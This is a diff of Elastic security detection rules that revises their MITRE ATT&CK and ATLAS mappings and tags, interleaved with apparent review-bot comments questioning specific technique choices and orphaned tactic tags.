@@ -225,26 +210,23 @@ FROM logs-aws.cloudtrail*, logs-endpoint.events.process-* METADATA _id, _version [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1651" name = "Cloud Administration Command" reference = "https://attack.mitre.org/techniques/T1651/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml index 13d278cd24c..539d57092b7 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml +++ b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
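Review bot: The hunk removes the `T1105 Ingress Tool Transfer` / Command and Control entry while adding T1059.004 Unix Shell under Execution; for a rule named `execution_aws_ec2_lolbin_via_ssm` that correlates CloudTrail SSM commands with endpoint process events, the living-off-the-land binaries it matches may well be download utilities, and if the ESQL query (outside this hunk) includes such tools the T1105 mapping was not wrong and should stay as a second `[[rule.threat]]`. If it is dropped deliberately, the `"Tactic: Command and Control"` tag removed in the preceding tags hunk is consistent, but the rule's description and `note` should be checked for C2 wording that is now unmapped.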
@@ -66,17 +66,7 @@ This detection links an interactive invocation of common networking utilities or risk_score = 47 rule_id = "9d312839-339a-4e10-af2e-a49b15b15d13" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Data Source: Kubernetes", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -111,24 +101,6 @@ sequence with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml index 211a1183c0f..aed9622e71e 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml +++ b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml 
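Review bot: Removing the Execution `[[rule.threat]]` (T1059.004) in the second hunk leaves this correlation rule mapped to Discovery only, although the description context in the hunk header ("an interactive invocation of common networking utilities") and the 1-second `sequence` describe an interactive shell command as the first half of the detection; the identical removal is made in the forbidden-request variant in the next file. If the API call rather than the shell is the behaviour of interest that is defensible, but keeping T1059.004 preserves the interactive-execution precondition as something searchable by technique. The Discovery entry continues below the hunk, so I could not see its tactic block.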
@@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,17 +68,7 @@ This rule correlates an interactive command execution inside a container with a risk_score = 47 rule_id = "5d1c962d-5d2a-48d4-bdcf-e980e3914947" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Data Source: Kubernetes", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,24 +105,6 @@ sequence with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml index 652be9cb05b..834d2e997a9 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml 
+++ b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -136,22 +136,9 @@ sequence with maxspan=1s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" [[rule.threat.technique]] id = "T1613" @@ -162,3 +149,16 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml index 95229fe817d..82698e80fea 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml 
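Review bot: The second hunk replaces the Execution entry's T1059.004 with `T1069 Permission Groups Discovery` inside the Discovery entry and the third hunk re-adds Execution as T1609; T1069 is about enumerating local, domain or cloud groups, so it fits only if the query (outside this hunk) matches RBAC or role endpoints — for generic API enumeration by unusual binaries the retained T1613 already covers the behaviour. This file section has no tags hunk, so `"Tactic: Execution"` and `"Tactic: Discovery"` are presumably already present in its `tags`; given the tag-versus-tactic test this commit introduces, confirm that before merging.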
+++ b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,18 +65,7 @@ This rule correlates interactive access to a pod’s service account token or CA risk_score = 47 rule_id = "4bd306f9-ee89-4083-91af-e61ed5c42b9a" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Data Source: Kubernetes", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Credential Access", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Credential Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -90,24 +79,6 @@ sequence with maxspan=60s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" 
@@ -127,11 +98,16 @@ reference = "https://attack.mitre.org/tactics/TA0006/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml index 0074a431b39..8370e42b986 100644 --- a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml +++ b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/12" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/11/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
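Review bot: The hunk swaps T1613 Discovery for `T1550.001 Application Access Token` under Lateral Movement; using a pod's service-account token against the API server is indeed T1550.001, but ATT&CK lists T1550 under both Defense Evasion and Lateral Movement, and a request from the same pod to its own cluster's API is not necessarily movement to another host — state in the rule `note` why Lateral Movement was chosen, or map Defense Evasion instead. The previous hunk in this file also removes the Execution (T1059.004) entry, so the discovery aspect of the follow-on API request is now unmapped; keeping T1613 in a Discovery entry alongside the new T1550.001 would not conflict with the per-framework duplicate-tactic check, since Discovery would appear once.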
@@ -88,12 +88,22 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - name = "Exploitation for Client Execution" - id = "T1203" - reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml index 13869c98f9b..5433f0a5906 100644 --- a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml +++ b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -50,19 +50,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"] type = "eql" query = ''' sequence by host.id with maxspan=10s @@ -73,16 +61,6 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique]] id = "T1204" name = "User Execution" 
@@ -97,29 +75,3 @@ reference = "https://attack.mitre.org/techniques/T1204/005/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/execution_openclaw_agent_child_process.toml b/rules/cross-platform/execution_openclaw_agent_child_process.toml index 919bf598224..fe4247891cb 100644 --- a/rules/cross-platform/execution_openclaw_agent_child_process.toml +++ b/rules/cross-platform/execution_openclaw_agent_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,18 +56,7 @@ references = [ risk_score = 47 rule_id = "a7c3e8f2-4b19-4d6a-9e5c-8f1a2b3c4d5e" severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: LLM", - "OS: Linux", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: LLM", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
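Review bot: With this hunk the npm pre/post-install rule keeps only Execution (T1204.005) after dropping Persistence (T1543, T1574) and the technique-less Defense Evasion entry; those were loose fits, but the rule's premise — lifecycle scripts running during package installation — is the package-manager supply-chain vector, `T1195.002 Compromise Software Supply Chain` (Initial Access), which is mapped neither before nor after this change. Adding an Initial Access `[[rule.threat]]` with T1195.002 and a matching `"Tactic: Initial Access"` tag would describe the risk better than the removed Persistence entries did. The preceding hunk also removes T1059.004 Unix Shell even though install scripts are executed through a shell; keep it if the second stage of the `sequence by host.id with maxspan=10s` query is the shell child process.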
@@ -83,36 +72,51 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat]] +framework = "MITRE ATLAS" +[[rule.threat.technique]] +id = "AML.T0051" +name = "LLM Prompt Injection" +reference = "https://atlas.mitre.org/techniques/AML.T0051/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - +id = "AML.TA0005" +name = "Execution" +reference = "https://atlas.mitre.org/tactics/AML.TA0005/" 
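Review bot: The new `[[rule.threat]]` with `framework = "MITRE ATLAS"` (AML.T0051 under AML.TA0005 Execution) has no counterpart in the tags hunk above, which rewrites `tags` without any `Mitre Atlas:` entry, whereas the two genai rules earlier in this patch carry `"Mitre Atlas: T0053"` / `"Mitre Atlas: T0086"` next to their ATLAS mappings; add `"Mitre Atlas: T0051"` (or, if the tag format is meant to carry the full id, `"Mitre Atlas: AML.T0051"` and align the other two) so ATLAS coverage stays discoverable by tag. Because the ATLAS tactic's display name is also "Execution", the single `"Tactic: Execution"` tag now stands for both frameworks, which the per-framework duplicate check in this commit allows, but the rule `note` should say that two frameworks are mapped. Formatting within the hunk is uneven: the T1059.001/.002/.003 subtechnique tables are back-to-back while .004 and .006 are separated by blank lines.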
diff --git a/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml b/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml index e69435f0dc9..7c525f9c541 100644 --- a/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml +++ b/rules/cross-platform/execution_pentest_eggshell_remote_admin_tool.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,21 +67,3 @@ EggShell is a post-exploitation tool used on macOS and Linux systems, allowing a - Enhance monitoring and detection capabilities to identify similar threats in the future, focusing on command and scripting interpreter activities as outlined in MITRE ATT&CK technique T1059.""" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/cross-platform/execution_potential_widespread_malware_infection.toml b/rules/cross-platform/execution_potential_widespread_malware_infection.toml index 3f52c996a02..e884ea942a1 100644 --- a/rules/cross-platform/execution_potential_widespread_malware_infection.toml +++ b/rules/cross-platform/execution_potential_widespread_malware_infection.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2024/05/08" maturity = "production" -updated_date = "2025/07/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
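Review bot: The second hunk deletes the rule's only visible `[[rule.threat]]` block (T1059.006 Python under Execution) and adds nothing back, while the context line kept above it still tells responders to focus on "command and scripting interpreter activities as outlined in MITRE ATT&CK technique T1059"; unless another threat entry exists outside the hunk, the rule now ships with no ATT&CK mapping and an investigation guide that cites a technique it no longer claims. The same whole-block removal is made to the widespread-malware-infection rule in the following file (T1204.002 / Execution). Neither file has a tags hunk in this patch, so if their `tags` still contain `"Tactic: Execution"` the tag-versus-tactic test this commit introduces would report it as an orphan tactic; either restore the entries or remove the tag and fix the guide text.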
@@ -72,21 +72,3 @@ from logs-endpoint.alerts-* ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml index 4a04cf04a54..477b492e00c 100644 --- a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml +++ b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/27" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/11/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
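Review bot: Removing the `T1204.002` / `Execution` mapping leaves `execution_potential_widespread_malware_infection.toml` with no `[[rule.threat]]` entry at all, and no tags hunk for this file is in the diff, so a `Tactic: Execution` tag there (the tags block is outside the hunk) would be left without a backing tactic. The same complete removal happens for `initial_access_elastic_defend_alert_genai_utility_descendant.toml` (hunk ending at L91) and `initial_access_zoom_meeting_with_no_passcode.toml` (hunk ending at L95). If these rules are meant to carry no ATT&CK mapping, stating that in the commit description lets consumers of coverage tooling know the drop is deliberate rather than accidental.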
@@ -83,20 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,16 +99,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" diff --git a/rules/cross-platform/execution_register_github_actions_runner.toml b/rules/cross-platform/execution_register_github_actions_runner.toml index bd5c534de51..68bacee30b4 100644 --- a/rules/cross-platform/execution_register_github_actions_runner.toml +++ b/rules/cross-platform/execution_register_github_actions_runner.toml 
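Review bot: The tags hunk adds `Tactic: Privilege Escalation`, but the threat hunk's new side only retains `T1609` under the existing entry and no `TA0004` tactic block is visible; the rest of the threat section is outside the hunk, so if no Privilege Escalation entry exists below, the tag is orphaned (a `T1611` Escape to Host entry would be the usual match for privileged-container creation, if that is what the query targets). Style: `tags` is collapsed from one entry per line to a single long line, which makes future tag diffs harder to read than the previous form; the same collapse occurs in the tags hunks ending at L76, L78, L79, L80, L82, L84, L86, L89, L91, L92 and L94.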
@@ -2,7 +2,7 @@ creation_date = "2025/11/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/11/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,24 +65,7 @@ references = [ risk_score = 47 rule_id = "57e118c1-19eb-4c20-93a6-8a6c30a5b48b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: Windows", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Data Source: Auditd Manager", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Auditd Manager", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -95,32 +78,31 @@ process where event.type == "start" and event.action in ("exec", "exec_event", " [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - +[[rule.threat.technique]] +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/execution_revershell_via_shell_cmd.toml b/rules/cross-platform/execution_revershell_via_shell_cmd.toml index 62a96f31eb4..2b950a5e42a 100644 --- a/rules/cross-platform/execution_revershell_via_shell_cmd.toml +++ b/rules/cross-platform/execution_revershell_via_shell_cmd.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
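Review bot: The `T1195.002` / `Initial Access` entry is replaced by `T1072` / `Execution`, which drops the supply-chain framing; the rule's description and references sit above the hunk, so if they still present runner registration as a software-supply-chain compromise the mapping and the text now disagree. `T1102.002` Bidirectional Communication is presumably chosen because a registered runner communicates with GitHub's web service, but nothing in the file records that reasoning; a one-line comment above the entry, e.g. `# registration establishes two-way communication with GitHub (web service C2 channel)`, would make the swap reviewable later.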
@@ -61,15 +61,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -89,14 +81,31 @@ process where event.type in ("start", "process_started") and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name 